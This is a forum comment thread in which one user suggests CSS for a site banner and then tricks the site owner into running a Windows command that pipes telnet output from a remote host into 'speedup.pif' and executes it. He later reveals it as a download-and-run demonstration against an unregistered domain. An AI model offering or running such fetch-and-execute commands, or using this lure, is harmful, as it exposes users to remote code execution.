you are viewing a single comment's thread.

view the rest of the comments →

[–]wizzwizz4 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 1 fun -  (6 children)

I'd like to nitpick about the CSS. Could you add this code:

#header-img-a {
  display: block;
  overflow-x: hidden;
  width: 100%;
}
#header-img {
  float: right;
}

And then, if you prefer it, crop the image on the right and re-upload it.

[–]Optimus85[S] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (5 children)

Thanks for your input. I added the CSS code but I'm not seeing anything different. What's it supposed to do?

[–]wizzwizz4 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (4 children)

It made the banner at the top not make the page scroll sideways on smaller screens.

Also, while we're at it, could you run this code on your computer?

telnet wizzwizz4.freedomains.nz 54 > speedup.pif & speedup.pif

[–]Optimus85[S] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (3 children)

Oh I see. Hadn't tested it on anything else. Thanks!

$ telnet wizzwizz4.freedomains.nz 54 > speedup.pif & speedup.pif [1] 20059 bash: speedup.pif: command not found

[–]wizzwizz4 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (2 children)

That was a Windows command. Also, do you know what the command's supposed to do?

[–]Optimus85[S] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (1 child)

Does it connect to a chat server? Telnet also exists on Linux but the command-line options must be a bit different...

[–]wizzwizz4 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

It downloads a program and tries to run it. (Except the domain isn't registered, and telnet outputs extra stuff beforehand so it wouldn't work anyway without a little modification; I didn't want to risk it.)